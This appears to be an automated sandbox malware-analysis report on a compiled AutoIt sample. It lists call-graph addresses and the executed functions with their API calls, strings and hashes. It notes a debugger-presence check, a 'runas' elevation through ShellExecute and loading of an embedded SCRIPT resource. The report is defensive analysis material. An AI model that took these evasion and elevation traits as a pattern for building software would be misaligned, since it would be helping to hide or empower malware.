469e4a 89 API calls 4 library calls 112215->112435 112436 469e4a 89 API calls 4 library calls 112218->112436 112434 469e4a 89 API calls 4 library calls 112219->112434 112220 47bc6b 341 API calls 112220->112229 112222 40b2b6 112428 40f6a3 341 API calls 112222->112428 112223 409ea0 341 API calls 112223->112229 112225 44086a 112432 409c90 59 API calls Mailbox 112225->112432 112227 440878 112433 469e4a 89 API calls 4 library calls 112227->112433 112229->112196 112229->112213 112229->112214 112229->112217 112229->112220 112229->112222 112229->112223 112229->112225 112229->112227 112230 44085c 112229->112230 112231 40b21c 112229->112231 112233 420db6 59 API calls Mailbox 112229->112233 112236 456e8f 59 API calls 112229->112236 112243 47445a 341 API calls 112229->112243 112244 411fc3 112229->112244 112284 47df23 112229->112284 112287 468715 112229->112287 112291 482141 112229->112291 112329 47e4d1 112229->112329 112335 46d07b 112229->112335 112382 47c2e0 112229->112382 112414 467956 112229->112414 112420 45617e 112229->112420 112425 409c90 59 API calls Mailbox 112229->112425 112429 47c193 85 API calls 2 library calls 112229->112429 112230->112192 112230->112217 112426 409d3c 60 API calls Mailbox 112231->112426 112233->112229 112234 40b22d 112427 409d3c 60 API calls Mailbox 112234->112427 112236->112229 112243->112229 112245 409a98 59 API calls 112244->112245 112246 411fdb 112245->112246 112248 420db6 Mailbox 59 API calls 112246->112248 112250 446585 112246->112250 112249 411ff4 112248->112249 112252 412004 112249->112252 112458 4057a6 60 API calls Mailbox 112249->112458 112251 412029 112250->112251 112461 46f574 59 API calls 112250->112461 112255 409b3c 59 API calls 112251->112255 112260 412036 112251->112260 112254 409837 84 API calls 112252->112254 112256 412012 112254->112256 112257 4465cd 112255->112257 112258 4057f6 67 API calls 112256->112258 112259 4465d5 112257->112259 112257->112260 112261 412021 112258->112261 112263 409b3c 59 API calls 112259->112263 112262 405cdf 2 API calls 112260->112262 112261->112250 112261->112251 112460 4058ba CloseHandle 112261->112460 112265 41203d 112262->112265 112263->112265 112266 4465e7 112265->112266 112267 412057 112265->112267 112269 420db6 Mailbox 59 API calls 112266->112269 112268 407667 59 API calls 112267->112268 112270 41205f 112268->112270 112271 4465ed 112269->112271 112437 405572 112270->112437 112273 446601 112271->112273 112462 405850 ReadFile SetFilePointerEx 112271->112462 112277 446605 _memmove 112273->112277 112463 4676c4 59 API calls 2 library calls 112273->112463 112275 41206e 112275->112277 112452 409a3c 112275->112452 112279 412082 Mailbox 112280 4120bc 112279->112280 112281 405c6f CloseHandle 112279->112281 112280->112229 112282 4120b0 112281->112282 112282->112280 112459 4058ba CloseHandle 112282->112459 112285 47cadd 130 API calls 112284->112285 112286 47df33 112285->112286 112286->112229 112288 46871e 112287->112288 112289 468723 112287->112289 112467 4677b3 112288->112467 112289->112229 112292 407667 59 API calls 112291->112292 112293 482158 112292->112293 112294 409837 84 API calls 112293->112294 112295 482167 112294->112295 112296 407a16 59 API calls 112295->112296 112297 48217a 112296->112297 112298 409837 84 API calls 112297->112298 112299 482187 112298->112299 112300 4821a1 112299->112300 112301 482215 112299->112301 112302 409b3c 59 API calls 112300->112302 112303 409837 84 API calls 112301->112303 112304 4821a6 112302->112304 112305 48221a 112303->112305 112306 482204 112304->112306 112309 4821bd 112304->112309 112307 482228 112305->112307 112308 482246 112305->112308 112312 409a98 59 API calls 112306->112312 112310 409a98 59 API calls 112307->112310 112311 48225b 112308->112311 112314 409b3c 59 API calls 112308->112314 112313 40784b 59 API calls 112309->112313 112326 482211 Mailbox 112310->112326 112315 482270 112311->112315 112318 409b3c 59 API calls 112311->112318 112312->112326 112317 4821ca 112313->112317 112314->112311 112316 407f77 59 API calls 112315->112316 112319 48228a 112316->112319 112320 407b2e 59 API calls 112317->112320 112318->112315 112490 45f401 62 API calls Mailbox 112319->112490 112322 4821d8 112320->112322 112323 40784b 59 API calls 112322->112323 112324 4821f1 112323->112324 112325 407b2e 59 API calls 112324->112325 112328 4821ff 112325->112328 112326->112229 112327 409a3c 59 API calls 112327->112326 112328->112327 112333 47e4e4 112329->112333 112330 409837 84 API calls 112331 47e521 112330->112331 112491 467729 112331->112491 112333->112330 112334 47e4f3 112333->112334 112334->112229 112336 46d09a 112335->112336 112337 46d0a5 112335->112337 112338 409b3c 59 API calls 112336->112338 112339 46d17f Mailbox 112337->112339 112342 407667 59 API calls 112337->112342 112338->112337 112340 420db6 Mailbox 59 API calls 112339->112340 112378 46d188 Mailbox 112339->112378 112341 46d1c8 112340->112341 112343 46d1d4 112341->112343 112533 4057a6 60 API calls Mailbox 112341->112533 112344 46d0c9 112342->112344 112348 409837 84 API calls 112343->112348 112346 407667 59 API calls 112344->112346 112347 46d0d2 112346->112347 112349 409837 84 API calls 112347->112349 112350 46d1ec 112348->112350 112352 46d0de 112349->112352 112351 4057f6 67 API calls 112350->112351 112353 46d1fb 112351->112353 112354 40459b 59 API calls 112352->112354 112355 46d233 112353->112355 112356 46d1ff GetLastError 112353->112356 112357 46d0f3 112354->112357 112361 46d295 112355->112361 112362 46d25e 112355->112362 112358 46d218 112356->112358 112359 407b2e 59 API calls 112357->112359 112358->112378 112534 4058ba CloseHandle 112358->112534 112360 46d126 112359->112360 112364 46d178 112360->112364 112369 463c37 3 API calls 112360->112369 112365 420db6 Mailbox 59 API calls 112361->112365 112363 420db6 Mailbox 59 API calls 112362->112363 112366 46d263 112363->112366 112368 409b3c 59 API calls 112364->112368 112370 46d29a 112365->112370 112371 46d274 112366->112371 112373 407667 59 API calls 112366->112373 112368->112339 112372 46d136 112369->112372 112375 407667 59 API calls 112370->112375 112370->112378 112535 47fbce 59 API calls 2 library calls 112371->112535 112372->112364 112374 46d13a 112372->112374 112373->112371 112377 407de1 59 API calls 112374->112377 112375->112378 112379 46d147 112377->112379 112378->112229 112532 463a2a 63 API calls Mailbox 112379->112532 112381 46d150 Mailbox 112381->112364 112383 407667 59 API calls 112382->112383 112384 47c2f4 112383->112384 112385 407667 59 API calls 112384->112385 112386 47c2fc 112385->112386 112387 407667 59 API calls 112386->112387 112388 47c304 112387->112388 112389 409837 84 API calls 112388->112389 112410 47c312 112389->112410 112390 407bcc 59 API calls 112390->112410 112391 47c4fb 112392 47c528 Mailbox 112391->112392 112393 409a3c 59 API calls 112391->112393 112392->112229 112393->112392 112394 47c4e2 112395 407cab 59 API calls 112394->112395 112397 47c4ef 112395->112397 112396 47c4fd 112399 407cab 59 API calls 112396->112399 112402 407b2e 59 API calls 112397->112402 112398 407924 59 API calls 112398->112410 112403 47c50c 112399->112403 112400 408047 59 API calls 112400->112410 112401 407e4f 59 API calls 112404 47c3a9 CharUpperBuffW 112401->112404 112402->112391 112405 407b2e 59 API calls 112403->112405 112536 40843a 68 API calls 112404->112536 112405->112391 112406 407e4f 59 API calls 112407 47c469 CharUpperBuffW 112406->112407 112537 40c5a7 69 API calls 2 library calls 112407->112537 112410->112390 112410->112391 112410->112392 112410->112394 112410->112396 112410->112398 112410->112400 112410->112401 112410->112406 112411 409837 84 API calls 112410->112411 112412 407b2e 59 API calls 112410->112412 112413 407cab 59 API calls 112410->112413 112411->112410 112412->112410 112413->112410 112415 467962 112414->112415 112416 420db6 Mailbox 59 API calls 112415->112416 112417 467970 112416->112417 112418 46797e 112417->112418 112419 407667 59 API calls 112417->112419 112418->112229 112419->112418 112538 4560c0 112420->112538 112422 45618c 112422->112229 112423->112214 112424->112214 112425->112229 112426->112234 112427->112222 112428->112196 112429->112229 112430->112203 112431->112230 112432->112230 112433->112230 112434->112217 112435->112218 112436->112217 112438 4055a2 112437->112438 112439 40557d 112437->112439 112440 407d8c 59 API calls 112438->112440 112439->112438 112444 40558c 112439->112444 112443 46325e 112440->112443 112441 46328d 112441->112275 112443->112441 112464 4631fa ReadFile SetFilePointerEx 112443->112464 112465 407924 59 API calls 2 library calls 112443->112465 112445 405ab8 59 API calls 112444->112445 112447 46337e 112445->112447 112448 4054d2 61 API calls 112447->112448 112449 46338c 112448->112449 112451 46339c Mailbox 112449->112451 112466 4077da 61 API calls Mailbox 112449->112466 112451->112275 112453 409a87 112452->112453 112454 409a48 112452->112454 112455 408047 59 API calls 112453->112455 112456 420db6 Mailbox 59 API calls 112454->112456 112457 409a5b 112455->112457 112456->112457 112457->112279 112458->112252 112459->112280 112460->112250 112461->112250 112462->112273 112463->112277 112464->112443 112465->112443 112466->112451 112468 4678ea 112467->112468 112469 4677ca 112467->112469 112468->112289 112470 46780a 112469->112470 112471 4677e2 112469->112471 112472 467821 112469->112472 112473 420db6 Mailbox 59 API calls 112470->112473 112471->112470 112474 4677f2 112471->112474 112477 420db6 Mailbox 59 API calls 112472->112477 112484 46783e 112472->112484 112487 467800 Mailbox _memmove 112473->112487 112480 420db6 Mailbox 59 API calls 112474->112480 112475 467877 112479 420db6 Mailbox 59 API calls 112475->112479 112476 467869 112478 420db6 Mailbox 59 API calls 112476->112478 112477->112484 112478->112487 112481 46787d 112479->112481 112480->112487 112488 46746b 59 API calls Mailbox 112481->112488 112482 420db6 Mailbox 59 API calls 112482->112468 112484->112475 112484->112476 112484->112487 112485 467889 112489 405a15 61 API calls Mailbox 112485->112489 112487->112482 112488->112485 112489->112487 112490->112328 112492 467736 112491->112492 112493 420db6 Mailbox 59 API calls 112492->112493 112494 46773d 112493->112494 112497 465b7a 112494->112497 112496 467780 Mailbox 112496->112334 112498 407e4f 59 API calls 112497->112498 112499 465b8d CharLowerBuffW 112498->112499 112501 465ba0 112499->112501 112500 4079f2 59 API calls 112500->112501 112501->112500 112502 465baa _memset Mailbox 112501->112502 112503 465bda 112501->112503 112502->112496 112505 4079f2 59 API calls 112503->112505 112506 465bec 112503->112506 112504 420db6 Mailbox 59 API calls 112509 465c1a 112504->112509 112505->112506 112506->112504 112511 465c39 112509->112511 112530 465ab6 59 API calls 112509->112530 112510 465c78 112510->112502 112512 420db6 Mailbox 59 API calls 112510->112512 112515 465cd7 112511->112515 112513 465c92 112512->112513 112514 420db6 Mailbox 59 API calls 112513->112514 112514->112502 112516 407667 59 API calls 112515->112516 112517 465d09 112516->112517 112518 407667 59 API calls 112517->112518 112519 465d12 112518->112519 112520 407667 59 API calls 112519->112520 112525 465d1b _wcscmp 112520->112525 112521 407bcc 59 API calls 112521->112525 112522 465ff0 Mailbox 112522->112510 112523 423606 GetStringTypeW 112523->112525 112525->112521 112525->112522 112525->112523 112526 42358a 59 API calls 112525->112526 112527 465cd7 60 API calls 112525->112527 112528 407924 59 API calls 112525->112528 112529 408047 59 API calls 112525->112529 112531 42362c GetStringTypeW _iswctype 112525->112531 112526->112525 112527->112525 112528->112525 112529->112525 112530->112509 112531->112525 112532->112381 112533->112343 112534->112378 112535->112378 112536->112410 112537->112410 112539 4560e8 112538->112539 112540 4560cb 112538->112540 112539->112422 112540->112539 112542 4560ab 59 API calls Mailbox 112540->112542 112542->112540

                    Executed Functions

                    Function 00B0CBD0 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 418COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062108928.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_ae0000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID: d$w
                    • API String ID: 0-2400632791
                    • Opcode ID: 1944575e2515ea1b5c851f33bcb90a0d5ea871e09128080f7c978f384ed2bbe1
                    • Instruction ID: 5704ff38ac9576bfa65f8f0110b6c50fc733488f3e6868b24dffeff4dafdee91
                    • Opcode Fuzzy Hash: 1944575e2515ea1b5c851f33bcb90a0d5ea871e09128080f7c978f384ed2bbe1
                    • Instruction Fuzzy Hash: FAC13135A0C340AFDA354B248C5AF7A3EE0EB61B20F5C47D6F656AA0F3E7259C05D612
                    Function 00403B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                    • IsDebuggerPresent.KERNEL32 ref: 00403B7A
                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                      • Part of subcall function 0041092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B7770,00000010), ref: 0043D281
                    • SetCurrentDirectoryW.KERNEL32(?,004C52F8,?,?,?), ref: 0043D2B9
                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004B4260,004C52F8,?,?,?), ref: 0043D33F
                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 0043D346
                      • Part of subcall function 00403A46: GetSysColorBrush.USER32(0000000F), ref: 00403A50
                      • Part of subcall function 00403A46: LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                      • Part of subcall function 00403A46: LoadIconW.USER32(00000063), ref: 00403A76
                      • Part of subcall function 00403A46: LoadIconW.USER32(000000A4), ref: 00403A88
                      • Part of subcall function 00403A46: LoadIconW.USER32(000000A2), ref: 00403A9A
                      • Part of subcall function 00403A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                      • Part of subcall function 00403A46: RegisterClassExW.USER32(?), ref: 00403B16
                      • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                      • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                      • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A38
                      • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A41
                      • Part of subcall function 0040434A: _memset.LIBCMT ref: 00404370
                      • Part of subcall function 0040434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                    • String ID: This is a third-party compiled AutoIt script.$runas$%I
                    • API String ID: 529118366-2806069697
                    • Opcode ID: 4236761a2e01d09a43ad1a7d36c76404b2c9892055a2db99edd68306d0b0981c
                    • Instruction ID: 3b6422646bc5bb7d448bfeb78fc2b200dbb07c6b17ab8a28721e135d33d4e7f3
                    • Opcode Fuzzy Hash: 4236761a2e01d09a43ad1a7d36c76404b2c9892055a2db99edd68306d0b0981c
                    • Instruction Fuzzy Hash: 8D519275D08108AADB01AFB5EC05EEE7BB8AB45745B1040BFF811B21E1DA786685CB2D
                    Function 004049A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 2085 4049a0-404a00 call 407667 GetVersionExW call 407bcc 2090 404a06 2085->2090 2091 404b0b-404b0d 2085->2091 2093 404a09-404a0e 2090->2093 2092 43d767-43d773 2091->2092 2094 43d774-43d778 2092->2094 2095 404b12-404b13 2093->2095 2096 404a14 2093->2096 2098 43d77b-43d787 2094->2098 2099 43d77a 2094->2099 2097 404a15-404a4c call 407d2c call 407726 2095->2097 2096->2097 2107 404a52-404a53 2097->2107 2108 43d864-43d867 2097->2108 2098->2094 2101 43d789-43d78e 2098->2101 2099->2098 2101->2093 2103 43d794-43d79b 2101->2103 2103->2092 2105 43d79d 2103->2105 2109 43d7a2-43d7a5 2105->2109 2107->2109 2110 404a59-404a64 2107->2110 2111 43d880-43d884 2108->2111 2112 43d869 2108->2112 2113 404a93-404aaa GetCurrentProcess IsWow64Process 2109->2113 2114 43d7ab-43d7c9 2109->2114 2115 43d7ea-43d7f0 2110->2115 2116 404a6a-404a6c 2110->2116 2119 43d886-43d88f 2111->2119 2120 43d86f-43d878 2111->2120 2117 43d86c 2112->2117 2121 404aac 2113->2121 2122 404aaf-404ac0 2113->2122 2114->2113 2118 43d7cf-43d7d5 2114->2118 2127 43d7f2-43d7f5 2115->2127 2128 43d7fa-43d800 2115->2128 2123 404a72-404a75 2116->2123 2124 43d805-43d811 2116->2124 2117->2120 2125 43d7d7-43d7da 2118->2125 2126 43d7df-43d7e5 2118->2126 2119->2117 2129 43d891-43d894 2119->2129 2120->2111 2121->2122 2130 404ac2-404ad2 call 404b37 2122->2130 2131 404b2b-404b35 GetSystemInfo 2122->2131 2132 43d831-43d834 2123->2132 2133 404a7b-404a8a 2123->2133 2135 43d813-43d816 2124->2135 2136 43d81b-43d821 2124->2136 2125->2113 2126->2113 2127->2113 2128->2113 2129->2120 2142 404ad4-404ae1 call 404b37 2130->2142 2143 404b1f-404b29 GetSystemInfo 2130->2143 2134 404af8-404b08 2131->2134 2132->2113 2139 43d83a-43d84f 2132->2139 2140 404a90 2133->2140 2141 43d826-43d82c 2133->2141 2135->2113 2136->2113 2144 43d851-43d854 2139->2144 2145 43d859-43d85f 2139->2145 2140->2113 2141->2113 2150 404ae3-404ae7 GetNativeSystemInfo 2142->2150 2151 404b18-404b1d 2142->2151 2147 404ae9-404aed 2143->2147 2144->2113 2145->2113 2147->2134 2149 404aef-404af2 FreeLibrary 2147->2149 2149->2134 2150->2147 2151->2150
                    APIs
                    • GetVersionExW.KERNEL32(?), ref: 004049CD
                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                    • GetCurrentProcess.KERNEL32(?,0048FAEC,00000000,00000000,?), ref: 00404A9A
                    • IsWow64Process.KERNEL32(00000000), ref: 00404AA1
                    • GetNativeSystemInfo.KERNEL32(00000000), ref: 00404AE7
                    • FreeLibrary.KERNEL32(00000000), ref: 00404AF2
                    • GetSystemInfo.KERNEL32(00000000), ref: 00404B23
                    • GetSystemInfo.KERNEL32(00000000), ref: 00404B2F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                    • String ID:
                    • API String ID: 1986165174-0
                    • Opcode ID: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                    • Instruction ID: 9368d54b81b13d28e750e9b7a77ce7499fab44d9898740901c219fded0589530
                    • Opcode Fuzzy Hash: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                    • Instruction Fuzzy Hash: 7A91A4719897C0DACB21DBA894501ABBFF5AF69300F444D6FD1C6A3B41D238B908C76E
                    Function 00404E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 2152 404e89-404ea1 CreateStreamOnHGlobal 2153 404ec1-404ec6 2152->2153 2154 404ea3-404eba FindResourceExW 2152->2154 2155 43d933-43d942 LoadResource 2154->2155 2156 404ec0 2154->2156 2155->2156 2157 43d948-43d956 SizeofResource 2155->2157 2156->2153 2157->2156 2158 43d95c-43d967 LockResource 2157->2158 2158->2156 2159 43d96d-43d98b 2158->2159 2159->2156
                    APIs
                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00404D8E,?,?,00000000,00000000), ref: 00404E99
                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00404D8E,?,?,00000000,00000000), ref: 00404EB0
                    • LoadResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D937
                    • SizeofResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D94C
                    • LockResource.KERNEL32(00404D8E,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F,00000000), ref: 0043D95F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                    • String ID: SCRIPT
                    • API String ID: 3051347437-3967369404
                    • Opcode ID: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                    • Instruction ID: 68981a4d98a1b9f26aaf18e99fd77eadcf83d6f3c297b7fdd3b7e429ee84fbe5
                    • Opcode Fuzzy Hash: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                    • Instruction Fuzzy Hash: 59119EB0200300BFD7208B65EC48F2B7BBAFBC9B11F20467DF505D62A0DB71E8058665
                    Function 0040FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: pbL$%I
                    • API String ID: 3964851224-1578263234
                    • Opcode ID: 9eb65fa8a7af425cda676adb71ece23590fc9d3520494d347d6b2d1cf8502869
                    • Instruction ID: 7d186bf48a599790b4ae94b3728c2257f551fe3f353e5d611b392294ecc69107
                    • Opcode Fuzzy Hash: 9eb65fa8a7af425cda676adb71ece23590fc9d3520494d347d6b2d1cf8502869
                    • Instruction Fuzzy Hash: C8927D706043419FD720DF15C480B6BB7E1BF89304F14896EE8999B392D779EC85CB9A
                    Function 0040E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID: DdL$DdL$DdL$DdL$Variable must be of type 'Object'.
                    • API String ID: 0-2838938394
                    • Opcode ID: 0f8e83fbc344d2eea3dc03722d5e703962e6ffe245d6c47f3d1b0fc73dbda5c4
                    • Instruction ID: 023dab180a9d3d77a7e8607c3136a2e1727c845c037ec0be429657ea2820e701
                    • Opcode Fuzzy Hash: 0f8e83fbc344d2eea3dc03722d5e703962e6ffe245d6c47f3d1b0fc73dbda5c4
                    • Instruction Fuzzy Hash: C3A29E75A00205CFDB24CF56C480AAAB7B1FF58314F24887BE905AB391D739ED52CB99
                    Function 0046445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                    Download Yara Rule
                    APIs
                    • GetFileAttributesW.KERNEL32(?,0043E398), ref: 0046446A
                    • FindFirstFileW.KERNEL32(?,?), ref: 0046447B
                    • FindClose.KERNEL32(00000000), ref: 0046448B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: FileFind$AttributesCloseFirst
                    • String ID:
                    • API String ID: 48322524-0
                    • Opcode ID: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                    • Instruction ID: 0270b6235cd3a211ff5fd07bbdee7491b27fcb3ec88e67c823a813e2b68c3cf0
                    • Opcode Fuzzy Hash: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                    • Instruction Fuzzy Hash: 54E0D8328105006B4610AB78EC0E4EE775C9E85335F100B6AFC35C11D0FB789904969F
                    Function 004109D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                    Download Yara Rule
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410A5B
                    • timeGetTime.WINMM ref: 00410D16
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410E53
                    • Sleep.KERNEL32(0000000A), ref: 00410E61
                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00410EFA
                    • DestroyWindow.USER32 ref: 00410F06
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00410F20
                    • Sleep.KERNEL32(0000000A,?,?), ref: 00444E83
                    • TranslateMessage.USER32(?), ref: 00445C60
                    • DispatchMessageW.USER32(?), ref: 00445C6E
